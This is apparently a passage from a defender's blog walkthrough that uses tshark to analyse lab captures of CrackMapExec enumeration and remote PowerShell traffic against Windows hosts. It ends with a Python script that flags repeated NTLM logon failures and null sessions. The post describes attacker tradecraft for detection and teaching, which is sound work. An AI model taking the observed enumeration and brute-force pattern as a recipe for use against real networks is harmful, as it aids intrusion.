10.0.0.100:35708       <-> 10.0.0.105:445           8      1512      10      1154      18      2666     4.658157000         1.3651
10.0.0.100:41016       <-> 10.0.0.3:445             7      1729       8      1030      15      2759     4.657942000         0.1189
10.0.0.100:52018       <-> 10.0.0.103:445           6      1677       8      1030      14      2707     4.657751000         0.0437
================================================================================
Let's do as in the previous instance and look into one of the conversations. Let's take the first one, with source port 35710.
root@securitynik:~/cme# tshark -n -r cme-enum-shares.pcap -Y "( ip.addr == 10.0.0.100 ) && ( ip.addr == 10.0.0.105 ) && ( tcp.port ==35710 ) && ( tcp.port == 445 )" | more
35 4.701908 10.0.0.100 → 10.0.0.105 TCP 74 35710 → 445 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=2860773415 TSecr=0 WS=128
37 4.702292 10.0.0.105 → 10.0.0.100 TCP 66 445 → 35710 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
38 4.702307 10.0.0.100 → 10.0.0.105 TCP 54 35710 → 445 [ACK] Seq=1 Ack=1 Win=29312 Len=0
41 4.703211 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request
44 4.706059 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
45 4.706077 10.0.0.100 → 10.0.0.105 TCP 54 35710 → 445 [ACK] Seq=74 Ack=253 Win=30336 Len=0
48 4.709555 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request
49 4.710187 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
52 4.719150 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
53 4.719743 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
56 4.728556 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
57 4.731502 10.0.0.105 → 10.0.0.100 SMB2 130 Session Setup Response, Error: STATUS_LOGON_FAILURE
59 4.734839 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
62 4.736363 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
63 4.753927 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
64 4.756372 10.0.0.105 → 10.0.0.100 SMB2 130 Session Setup Response, Error: STATUS_LOGON_FAILURE
68 4.760402 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
69 4.761060 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
72 4.772888 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
74 4.775421 10.0.0.105 → 10.0.0.100 SMB2 130 Session Setup Response, Error: STATUS_LOGON_FAILURE
76 4.778370 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
78 4.779050 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
81 4.786392 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
85 4.789841 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
103 4.829145 10.0.0.105 → 10.0.0.100 TCP 139 [TCP Retransmission] 445 → 35710 [PSH, ACK] Seq=2313 Ack=3016 Win=2100736 Len=85
104 4.829160 10.0.0.100 → 10.0.0.105 TCP 66 35710 → 445 [ACK] Seq=3016 Ack=2398 Win=35712 Len=0 SLE=2313 SRE=2398
118 4.870576 10.0.0.100 → 10.0.0.105 SMB2 216 Encrypted SMB3
119 4.870976 10.0.0.105 → 10.0.0.100 SMB2 190 Encrypted SMB3
120 4.870995 10.0.0.100 → 10.0.0.105 TCP 54 35710 → 445 [ACK] Seq=3178 Ack=2534 Win=36736 Len=0
...........
463 5.966266 10.0.0.105 → 10.0.0.100 SMB2 182 Encrypted SMB3
464 5.970495 10.0.0.100 → 10.0.0.105 SMB2 178 Encrypted SMB3
465 5.970824 10.0.0.105 → 10.0.0.100 SMB2 178 Encrypted SMB3
468 6.013389 10.0.0.100 → 10.0.0.105 TCP 54 35710 → 445 [ACK] Seq=14032 Ack=27752 Win=185856 Len=0
484 6.040763 10.0.0.100 → 10.0.0.105 TCP 54 35710 → 445 [FIN, ACK] Seq=14032 Ack=27752 Win=185856 Len=0
485 6.041096 10.0.0.105 → 10.0.0.100 TCP 60 445 → 35710 [ACK] Seq=27752 Ack=14033 Win=2102272 Len=0
486 6.042828 10.0.0.105 → 10.0.0.100 TCP 60 445 → 35710 [RST, ACK] Seq=27752 Ack=14033 Win=0 Len=0
Uh oh!! Looks like this communication is encrypted with SMB3. However, if you pay close attention above, we see a number of "STATUS_LOGON_FAILURE" responses for "SECURITYNIK\Administrator" before the session setup finally succeeds. Let's leave this for now. Note also that most of the other conversations look much the same.
Let's now transition to the enumeration of the users and groups, to see what we can learn from the packets.
Looking at the traffic from the user enumeration, if we start with the conversations, we see 10 conversations being reported in the pcap file. If we look at the first one, with port 36662, we see this ties back into our log analysis. Let's take a look at these packets to see what we can learn.
root@securitynik:~/cme# tshark -n -r cme-enum-users.pcap -z conv,tcp -q
================================================================================
TCP Conversations
Filter:<No Filter>
                                               |       <-      | |       ->      | |     Total     |    Relative    |  Duration  |
                                               | Frames  Bytes | | Frames  Bytes | | Frames  Bytes |      Start     |            |
10.0.0.100:36662       <-> 10.0.0.105:445          81     20594      78     18654     159     39248     9.171767000         1.2807
10.0.0.100:52980       <-> 10.0.0.103:445          58     15862      60     14173     118     30035     9.321117000         0.6187
10.0.0.100:36660       <-> 10.0.0.105:445          13      2714      15      2933      28      5647     9.060796000         1.3251
10.0.0.100:52978       <-> 10.0.0.103:445          13      3074      15      2887      28      5961     9.208452000         1.1786
10.0.0.100:36652       <-> 10.0.0.105:445           9      1638      10      1166      19      2804     8.944584000         1.5418
10.0.0.100:41964       <-> 10.0.0.3:445             7      1729      11      1451      18      3180     8.997733000         1.4911
10.0.0.100:52972       <-> 10.0.0.103:445           7      1746      11      1459      18      3205     8.998512000         1.4915
10.0.0.100:36656       <-> 10.0.0.105:445           8      1525       9      1409      17      2934     8.998254000         1.5223
10.0.0.100:52962       <-> 10.0.0.103:445           6      1677       8      1030      14      2707     8.944150000         0.0536
10.0.0.100:41960       <-> 10.0.0.3:445             6      1669       8      1030      14      2699     8.944373000         0.0425
================================================================================
Looking at the actual packets now:
root@securitynik:~/cme# tshark -n -r cme-enum-users.pcap -Y "( tcp.port == 36662 ) && ( tcp.port == 445 )"
109 9.171767 10.0.0.100 → 10.0.0.105 TCP 74 36662 → 445 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=2872505954 TSecr=0 WS=128
110 9.172057 10.0.0.105 → 10.0.0.100 TCP 66 445 → 36662 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
111 9.172070 10.0.0.100 → 10.0.0.105 TCP 54 36662 → 445 [ACK] Seq=1 Ack=1 Win=29312 Len=0
113 9.180091 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request
115 9.193928 10.0.0.105 → 10.0.0.100 TCP 60 445 → 36662 [ACK] Seq=1 Ack=74 Win=2102272 Len=0
130 9.223667 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
131 9.223681 10.0.0.100 → 10.0.0.105 TCP 54 36662 → 445 [ACK] Seq=74 Ack=253 Win=30336 Len=0
135 9.230843 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request
143 9.256814 10.0.0.105 → 10.0.0.100 TCP 60 445 → 36662 [ACK] Seq=253 Ack=184 Win=2102272 Len=0
193 9.550036 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
196 9.554980 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
197 9.557240 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
200 9.572289 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
201 9.574589 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
206 9.591850 10.0.0.100 → 10.0.0.105 SMB2 216 Encrypted SMB3
207 9.593175 10.0.0.105 → 10.0.0.100 SMB2 190 Encrypted SMB3
210 9.607005 10.0.0.100 → 10.0.0.105 SMB2 238 Encrypted SMB3
211 9.607508 10.0.0.105 → 10.0.0.100 SMB2 262 Encrypted SMB3
214 9.617532 10.0.0.100 → 10.0.0.105 SMB2 294 Encrypted SMB3
215 9.617975 10.0.0.105 → 10.0.0.100 SMB2 190 Encrypted SMB3
218 9.628218 10.0.0.100 → 10.0.0.105 SMB2 223 Encrypted SMB3
219 9.628717 10.0.0.105 → 10.0.0.100 SMB2 258 Encrypted SMB3
222 9.639361 10.0.0.100 → 10.0.0.105 SMB2 258 Encrypted SMB3
....
423 10.449068 10.0.0.100 → 10.0.0.105 SMB2 178 Encrypted SMB3
424 10.449465 10.0.0.105 → 10.0.0.100 SMB2 178 Encrypted SMB3
425 10.451778 10.0.0.100 → 10.0.0.105 SMB2 178 Encrypted SMB3
426 10.452430 10.0.0.105 → 10.0.0.100 TCP 60 445 → 36662 [RST, ACK] Seq=16173 Ack=14423 Win=0 Len=0
Uh oh. From above we see that this traffic is also encrypted. This makes it difficult for our security monitoring tools to do their jobs effectively.
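Encryption hides the payload, but not everything: in both the share-enumeration and user-enumeration captures above, the Session Setup exchange runs in the clear before the session flips to "Encrypted SMB3", so the string of STATUS_LOGON_FAILURE responses, the eventual success, and the earlier null-session logon (User: \) are all still visible in tshark's one-line summaries. As an added example (my own code, not from this post), here is a small state machine that reads those default summary lines and reports exactly those events per client/server pair. The sample lines are constructed to follow the shape of the listings above; frame 86 (the request preceding the STATUS_ACCESS_DENIED seen from 10.0.0.3) is invented, since the post only shows the response.

```python
"""Pull NTLM logon outcomes out of tshark's default one-line SMB2 summaries.

Even after a session switches to 'Encrypted SMB3', the Session Setup exchange
that preceded it is in the clear, so repeated STATUS_LOGON_FAILURE responses
followed by a success, and null-session logons (User: \\), remain visible.
The sample lines are constructed in the shape of the listings above."""
import re
from collections import defaultdict

# frame  time  src → dst  proto  length  info  (tshark prints "→" in UTF-8 locales, "->" otherwise)
LINE_RE = re.compile(
    r"^\s*(?P<frame>\d+)\s+(?P<time>[\d.]+)\s+(?P<src>[\d.]+)\s+(?:→|->)\s+"
    r"(?P<dst>[\d.]+)\s+(?P<proto>\S+)\s+(?P<len>\d+)\s+(?P<info>.*)$")

SAMPLE = """\
447 10.243642 10.0.0.100 → 10.0.0.105 SMB2 235 Session Setup Request, NTLMSSP_AUTH, User: \\
448 10.244629 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
449 10.247201 10.0.0.100 → 10.0.0.105 SMB2 126 Session Logoff Request
86 7.160000 10.0.0.100 → 10.0.0.3 SMB2 235 Session Setup Request, NTLMSSP_AUTH, User: \\
87 7.163947 10.0.0.3 → 10.0.0.100 SMB2 130 Session Setup Response, Error: STATUS_ACCESS_DENIED
52 4.719150 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
53 4.719743 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
56 4.728556 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\\administrator
57 4.731502 10.0.0.105 → 10.0.0.100 SMB2 130 Session Setup Response, Error: STATUS_LOGON_FAILURE
63 4.753927 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\\administrator
64 4.756372 10.0.0.105 → 10.0.0.100 SMB2 130 Session Setup Response, Error: STATUS_LOGON_FAILURE
72 4.772888 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\\administrator
74 4.775421 10.0.0.105 → 10.0.0.100 SMB2 130 Session Setup Response, Error: STATUS_LOGON_FAILURE
81 4.786392 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\\administrator
85 4.789841 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
118 4.870576 10.0.0.100 → 10.0.0.105 SMB2 216 Encrypted SMB3
119 4.870976 10.0.0.105 → 10.0.0.100 SMB2 190 Encrypted SMB3
"""


def _new_session():
    return {"pending": None, "failures": defaultdict(int), "successes": [],
            "null_sessions": 0, "encrypted_frames": 0}


def analyse(lines):
    """State per (client, server) pair, driven by the Session Setup exchange."""
    sessions = {}
    for raw in lines:
        m = LINE_RE.match(raw)
        if not m or m["proto"] != "SMB2":
            continue
        src, dst, info = m["src"], m["dst"], m["info"]
        if "Request" in info:
            key = (src, dst)
        elif "Response" in info:
            key = (dst, src)
        elif (src, dst) in sessions:      # e.g. "Encrypted SMB3" carries no direction word
            key = (src, dst)
        elif (dst, src) in sessions:
            key = (dst, src)
        else:
            continue
        s = sessions.setdefault(key, _new_session())
        if "Session Setup Request, NTLMSSP_AUTH" in info:
            s["pending"] = info.split("User: ", 1)[1].strip()
        elif "STATUS_LOGON_FAILURE" in info or "STATUS_ACCESS_DENIED" in info:
            s["failures"][s["pending"]] += 1
        elif "Session Setup Response" in info and "Error:" not in info:
            if s["pending"] in (None, "\\", ""):   # "User: \" is an anonymous / null session
                s["null_sessions"] += 1
            else:
                s["successes"].append(s["pending"])
        elif "Encrypted SMB3" in info:
            s["encrypted_frames"] += 1
    return sessions


def findings(sessions, failure_threshold=3):
    """Triage lines; the threshold is a tuning knob, not a protocol fact."""
    out = []
    for (client, server), s in sessions.items():
        for user, n in s["failures"].items():
            if n >= failure_threshold:
                tail = "then succeeded" if user in s["successes"] else "no success seen"
                out.append(f"{client} -> {server}: {n} logon failures for {user!r}, {tail}")
        if s["null_sessions"]:
            out.append(f"{client} -> {server}: {s['null_sessions']} null-session logon(s) accepted")
        if s["encrypted_frames"] and s["successes"]:
            out.append(f"{client} -> {server}: {s['encrypted_frames']} Encrypted SMB3 frame(s) "
                       f"after logon as {s['successes'][-1]!r}; payload is opaque, the logon is the signal")
    return out


if __name__ == "__main__":
    for line in findings(analyse(SAMPLE.splitlines())):
        print(line)
```

Feed it `tshark -n -r file.pcap -Y smb2` output on stdin and it will produce the same three observations for the captures above: repeated failures for one account followed by a success, a null session that one host accepted, and an authenticated session whose content cannot be inspected. Those are the events worth forwarding to a SIEM when the payload itself is out of reach.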
As the previous session was encrypted, let's now see what we can get from the packets associated with the password policy enumeration.
Without further ado, let's take a look at the packet capture to see what type of traffic might be in here.
Looking at the protocol hierarchy, we see some SMB and SMB2 traffic.
root@securitynik:~/cme# tshark -n -r cme-pass-pol.pcap -z io,phs -q
===================================================================
Protocol Hierarchy Statistics
Filter:

eth                                      frames:113 bytes:21694
  arp                                    frames:2 bytes:102
  ip                                     frames:111 bytes:21592
    tcp                                  frames:111 bytes:21592
      nbss                               frames:78 bytes:19550
        smb                              frames:4 bytes:508
        smb2                             frames:74 bytes:19042
===================================================================
Looking at the above, I would conclude that there is no encrypted traffic. Let's see if that is true.
Peeking first into the SMB traffic, we see:
root@securitynik:~/cme# tshark -n -r cme-pass-pol.pcap -Y "smb"
6 3.214791 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request
20 3.237020 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request
34 3.279046 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request
59 3.394125 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request
From above, we see the SMB packets all seem to be associated with the SMB Negotiate Protocol Request. I would assume at this point that the server responded stating it would like to use SMB2, which is why we do not see any additional SMB1 traffic.
Let's now look into the SMB2 traffic.
root@securitynik:~/cme# tshark -n -r cme-pass-pol.pcap -Y "smb2"
7 3.215534 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
9 3.218110 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request
10 3.218617 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
11 3.222438 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
12 3.224476 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
13 3.229892 10.0.0.100 → 10.0.0.105 SMB2 235 Session Setup Request, NTLMSSP_AUTH, User: \
14 3.230867 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
15 3.234048 10.0.0.100 → 10.0.0.105 SMB2 126 Session Logoff Request
16 3.234344 10.0.0.105 → 10.0.0.100 SMB2 126 Session Logoff Response
21 3.238371 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
23 3.241025 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request
24 3.241635 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
25 3.248880 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
26 3.249527 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
27 3.256058 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
28 3.258185 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
35 3.279840 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
37 3.293799 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request
38 3.294739 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
39 3.298425 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
41 3.299181 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
42 3.305931 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
43 3.308715 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
44 3.313429 10.0.0.100 → 10.0.0.105 SMB2 216 Encrypted SMB3
45 3.313913 10.0.0.105 → 10.0.0.100 SMB2 190 Encrypted SMB3
.....
54 3.377248 10.0.0.100 → 10.0.0.105 SMB2 223 Encrypted SMB3
55 3.377657 10.0.0.105 → 10.0.0.100 SMB2 238 Encrypted SMB3
60 3.396247 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
62 3.400194 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request
63 3.400920 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
64 3.412338 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
65 3.413306 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
67 3.434020 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
68 3.436640 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
69 3.451598 10.0.0.100 → 10.0.0.105 SMB2 216 Encrypted SMB3
77 3.522068 10.0.0.100 → 10.0.0.105 SMB2 258 Encrypted SMB3
78 3.522898 10.0.0.105 → 10.0.0.100 SMB2 190 Encrypted SMB3
......
99 3.704565 10.0.0.100 → 10.0.0.105 SMB2 223 Encrypted SMB3
100 3.704911 10.0.0.105 → 10.0.0.100 SMB2 246 Encrypted SMB3
Holy smack! Looks like yet another set of encrypted traffic. Well nothing else to see here at this time. Let's move on to see what things look like when we execute remote commands.
Let's now see what the communication looks like when crackmapexec runs a powershell command.
As always, when we first look at our pcap file, we look at the protocol hierarchy to understand what is in the file. Let's do that.
root@securitynik:~/cme# tshark -n -r cme-powershell.pcap -z io,phs -q
===================================================================
Protocol Hierarchy Statistics
Filter:

eth                                      frames:247 bytes:82427
  arp                                    frames:8 bytes:408
  ip                                     frames:239 bytes:82019
    udp                                  frames:4 bytes:860
      ssdp                               frames:4 bytes:860
    tcp                                  frames:235 bytes:81159
      nbss                               frames:121 bytes:29648
        smb                              frames:3 bytes:381
        smb2                             frames:118 bytes:29267
          tcp.segments                   frames:1 bytes:2742
      dcerpc                             frames:31 bytes:40114
        isystemactivator                 frames:2 bytes:1644
        remunk                           frames:2 bytes:300
        dcerpc.stub_data                 frames:5 bytes:21630
        dcerpc.fragments                 frames:1 bytes:790
===================================================================
Looking at the SMB communication, we see below, once again, that this is more than likely the client trying to communicate via SMB version 1.
root@securitynik:~/cme# tshark -n -r cme-powershell.pcap -Y "smb"
   16  43.408475   10.0.0.100 → 10.0.0.105   SMB 127 Negotiate Protocol Request
   30  43.435753   10.0.0.100 → 10.0.0.105   SMB 127 Negotiate Protocol Request
   42  43.463106   10.0.0.100 → 10.0.0.105   SMB 127 Negotiate Protocol Request
Once again let's look at the SMB2 communication.
root@securitynik:~/cme# tshark -n -r cme-powershell.pcap -Y "smb2"
   17  43.409255   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   19  43.413105   10.0.0.100 → 10.0.0.105   SMB2 164 Negotiate Protocol Request
   20  43.413704   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   21  43.418281   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   22  43.418780   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   23  43.426458   10.0.0.100 → 10.0.0.105   SMB2 235 Session Setup Request, NTLMSSP_AUTH, User: \
   24  43.427636   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
   25  43.432235   10.0.0.100 → 10.0.0.105   SMB2 126 Session Logoff Request
   26  43.432623   10.0.0.105 → 10.0.0.100   SMB2 126 Session Logoff Response
   31  43.437344   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   33  43.440996   10.0.0.100 → 10.0.0.105   SMB2 164 Negotiate Protocol Request
   34  43.441606   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   35  43.446277   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   36  43.446815   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   37  43.455948   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   38  43.458155   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
   43  43.464624   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   45  43.468269   10.0.0.100 → 10.0.0.105   SMB2 164 Negotiate Protocol Request
   46  43.468962   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   49  43.473830   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   50  43.474372   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   51  43.481931   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   52  43.484388   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
....
  227  47.334141   10.0.0.105 → 10.0.0.100   SMB2 234 Encrypted SMB3
  228  47.338399   10.0.0.100 → 10.0.0.105   SMB2 178 Encrypted SMB3
  229  47.343532   10.0.0.105 → 10.0.0.100   SMB2 178 Encrypted SMB3
So far we have seen that the majority of this tool's SMB communication is encrypted. Let's see if there is anything we can learn from the "dcerpc" communication.
root@securitynik:~/cme# tshark -n -r cme-powershell.pcap -Y "dcerpc"
   70  43.594887   10.0.0.100 → 10.0.0.105   DCERPC 166 Bind: call_id: 1, Fragment: Single, 1 context items: ISystemActivator V0.0 (32bit NDR), NTLMSSP_NEGOTIATE
   71  43.595566   10.0.0.105 → 10.0.0.100   DCERPC 406 Bind_ack: call_id: 1, Fragment: Single, max_xmit: 4280 max_recv: 4280, 1 results: Acceptance, NTLMSSP_CHALLENGE
   73  43.603971   10.0.0.100 → 10.0.0.105   DCERPC 524 AUTH3: call_id: 1, Fragment: Single, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   76  43.640433   10.0.0.100 → 10.0.0.105   ISystemActivator 566 RemoteCreateInstance request
   77  43.645133   10.0.0.105 → 10.0.0.100   ISystemActivator 1078 RemoteCreateInstance response
   81  43.682025   10.0.0.100 → 10.0.0.105   DCERPC 166 Bind: call_id: 1, Fragment: Single, 1 context items: f309ad18-d86a-11d0-a075-00c04fb68820 V0.0 (32bit NDR), NTLMSSP_NEGOTIATE
   82  43.682530   10.0.0.105 → 10.0.0.100   DCERPC 406 Bind_ack: call_id: 1, Fragment: Single, max_xmit: 4280 max_recv: 4280, 1 results: Acceptance, NTLMSSP_CHALLENGE
   86  43.702770   10.0.0.100 → 10.0.0.105   DCERPC 524 AUTH3: call_id: 1, Fragment: Single, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   88  43.718458   10.0.0.100 → 10.0.0.105   DCERPC 210 Request: call_id: 2, Fragment: Single, opnum: 6, Ctx: 0 f309ad18-d86a-11d0-a075-00c04fb68820 V0
   89  43.719805   10.0.0.105 → 10.0.0.100   DCERPC 294 Response: call_id: 2, Fragment: Single, Ctx: 0 f309ad18-d86a-11d0-a075-00c04fb68820 V0
   90  43.727167   10.0.0.100 → 10.0.0.105   DCERPC 166 Alter_context: call_id: 3, Fragment: Single, 1 context items: IRemUnknown V0.0 (32bit NDR), NTLMSSP_NEGOTIATE
   91  43.727812   10.0.0.105 → 10.0.0.100   DCERPC 402 Alter_context_resp: call_id: 3, Fragment: Single, max_xmit: 4280 max_recv: 4280, 1 results: Acceptance, NTLMSSP_CHALLENGE
   92  43.747847   10.0.0.100 → 10.0.0.105   DCERPC 524 AUTH3: call_id: 3, Fragment: Single, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   94  43.765583   10.0.0.100 → 10.0.0.105   IRemUnknown 182 RemRelease request Cnt=1 Refs=1-0
   95  43.766108   10.0.0.105 → 10.0.0.100   IRemUnknown 118 RemRelease response -> S_OK
   96  43.772729   10.0.0.100 → 10.0.0.105   DCERPC 166 Alter_context: call_id: 5, Fragment: Single, 1 context items: 9556dc99-828c-11cf-a37e-00aa003240c7 V0.0 (32bit NDR), NTLMSSP_NEGOTIATE
   97  43.773407   10.0.0.105 → 10.0.0.100   DCERPC 402 Alter_context_resp: call_id: 5, Fragment: Single, max_xmit: 4280 max_recv: 4280, 1 results: Acceptance, NTLMSSP_CHALLENGE
   98  43.788367   10.0.0.100 → 10.0.0.105   DCERPC 524 AUTH3: call_id: 5, Fragment: Single, NTLMSSP_AUTH, User: SECURITYNIK\administrator
  100  43.827914   10.0.0.100 → 10.0.0.105   DCERPC 226 Request: call_id: 6, Fragment: Single, opnum: 6, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
  101  43.835340   10.0.0.105 → 10.0.0.100   DCERPC 4326 Response: call_id: 6, Fragment: 1st, Ctx: 2
  103  43.835429   10.0.0.105 → 10.0.0.100   DCERPC 4326 Response: call_id: 6, Fragment: Mid, Ctx: 2
  105  43.835655   10.0.0.105 → 10.0.0.100   DCERPC 4326 Response: call_id: 6, Fragment: Mid, Ctx: 2
  107  43.835711   10.0.0.105 → 10.0.0.100   DCERPC 4326 Response: call_id: 6, Fragment: Mid, Ctx: 2
  109  43.835917   10.0.0.105 → 10.0.0.100   DCERPC 4326 Response: call_id: 6, Fragment: Mid, Ctx: 2
  111  43.835981   10.0.0.105 → 10.0.0.100   DCERPC 790 Response: call_id: 6, Fragment: Last, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
  114  44.446346   10.0.0.100 → 10.0.0.105   DCERPC 2050 Request: call_id: 7, Fragment: Single, opnum: 24, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
  116  44.578642   10.0.0.105 → 10.0.0.100   DCERPC 1270 Response: call_id: 7, Fragment: Single, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
  144  44.726719   10.0.0.100 → 10.0.0.105   DCERPC 2046 Request: call_id: 8, Fragment: Single, opnum: 24, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
  147  44.753078   10.0.0.105 → 10.0.0.100   DCERPC 1270 Response: call_id: 8, Fragment: Single, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
